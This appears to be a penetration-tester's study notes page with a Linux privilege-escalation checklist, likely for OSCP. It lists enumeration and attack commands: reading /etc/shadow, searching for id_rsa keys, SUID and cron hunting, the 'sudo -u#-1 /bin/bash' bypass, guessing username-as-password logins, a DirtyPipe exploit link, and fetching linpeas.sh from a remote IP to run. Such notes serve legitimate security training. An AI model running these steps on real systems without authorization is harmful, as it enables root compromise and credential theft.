// notes/ PrivEsc — Linux
🐧

Checklist

Notes from oscp.adot8.com — linux privilege escalation.

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/checklist

Checklist

code
01id
code
01find / -group <groups> 2>/dev/null
code
01history
code
01sudo -l
code
01sudo -V | grep version
code
01find / -name id_rsa 2>/dev/null
<pre><code><strong>find / -type f -perm -04000 -ls 2>/dev/null </strong></code></pre>

{% hint style="info" %} Research any binary with a SUID bit that looks out of place

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

DirtyPipe can be used to abuse custom SUID binaries

  • 5.16.11
  • 5.15.25
  • 5.10.102
  • 5.9.0 {% endhint %}
code
01ls -la /etc/passwd /etc/shadow
code
01cat /etc/crontab
02crontab -l
code
01getcap -r / 2>/dev/null
02/usr/sbin/getcap -r / 2>/dev/null
code
01cat /etc/exports
code
01ls -la /var/backups
code
01sudo -u#-1 /bin/bash
<pre><code><strong>ss -anp </strong>routel cat /etc/iptables/rules.v4 </code></pre>
code
01dpkg -l
code
01cat .bashrc
<pre><code><strong>ps -aux </strong>ps -aux | grep cron &#x3C;-- search for "root /usr/sbin/cron -f" </code></pre>

{% hint style="info" %} Snoop on processes using pspy - some cron jobs may be running in the background

Research and enumerate literally every cron job running {% endhint %}

{% hint style="info" %} su into other users using their usernames as passwords; vagrant:vagrant {% endhint %}

Search for credentials in files

Run PEAS and LinEnum

code
01wget 192.168.45.x/linpeas.sh
02curl 192.168.45.x/linpeas.sh -o linpeas.sh
03chmod +x linpeas.sh

{% hint style="danger" %} Search for exploits for sudo version {% endhint %}